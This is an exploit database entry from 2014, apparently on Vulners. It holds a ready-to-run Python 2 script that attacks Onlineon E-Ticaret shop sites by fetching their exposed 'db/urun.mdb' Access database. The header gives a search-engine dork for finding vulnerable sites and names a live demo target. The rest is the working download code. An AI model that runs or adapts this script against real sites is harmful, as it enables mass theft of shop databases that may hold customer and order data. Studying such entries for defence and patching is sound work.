Onlineon E-Ticaret Database Disclosure Exploit

🗓️ 29 Sep 2014 00:00:00Reported by RootType

Onlineon E-Ticaret Database Disclosure Exploit python script to download and check database lin


                                                #!/usr/bin/env python
#-*- coding:cp1254 -*-
 
# Title        : Onlineon E-Ticaret Database Disclosure Exploit (.py)
# dork         : inurl:&quot;default.asp?git=sepet&quot;
# Author       : ZoRLu / [email protected] / [email protected]
# Home         : http://milw00rm.com / its online
# Download     : http://www.onlineonweb.com/eticaret.html
# Demo         : http://ayvalikkokluzeytincilik.com
# date         : 06/09/2014
# Python       : V 2.7
# Thks         : exploit-db.com and others
 
   
import sys, urllib2, re, os, time
   
def indiriyoruz(url):
       
    import urllib
    aldosyayi = urllib.urlopen(url)
    indiraq = open(url.split('/')[-1], 'wb')
    indiraq.write(aldosyayi.read())
    aldosyayi.close()
    indiraq.close()
   
if len(sys.argv) &lt; 2:
    os.system(['clear','cls'][1])
    print &quot; ____________________________________________________________________&quot;
    print &quot;|                                                                    |&quot;
    print &quot;|   Onlineon E-Ticaret Database Disclosure Exploit (.py)             |&quot;
    print &quot;|   ZoRLu / milw00rm.com                                             |&quot;
    print &quot;|   exploit.py http://site.com/path/                                 |&quot;
    print &quot;|____________________________________________________________________|&quot;
    sys.exit(1)
   
''' link kontrol 1 '''
                       
koybasina = &quot;http://&quot;
koykicina = &quot;/&quot;
sitemiz = sys.argv[1]
 
if sitemiz[-1:] != koykicina:
    sitemiz += koykicina
       
if sitemiz[:7]  != koybasina:
    sitemiz =  koybasina + sitemiz
   
 
database = &quot;db/urun.mdb&quot;
url2 = sitemiz + database
print   &quot;\n&quot; + url2
print &quot;\nlink check&quot;
time.sleep(1)
   
''' link kontrol 2 '''
   
try:
    adreskontrol = urllib2.urlopen(url2).read()
       
    if len(adreskontrol) &gt; 0:
                                           
        print &quot;\nGood Job Bro!&quot;
       
except urllib2.HTTPError:
        import os
        import sys
        print &quot;\nForbidden Err0r, Security!&quot;
        sys.exit(1)
       
   
''' dosya indiriliyor '''
   
if __name__ == '__main__':
    import sys
    if len(sys.argv) == 2:
        print &quot;\nFile is Downloading\n&quot;
        try:
            indiriyoruz(url2)
        except IOError:
            print '\nFilename not found.'

29 Sep 2014 00:00Current

7.1High risk

Vulners AI Score7.1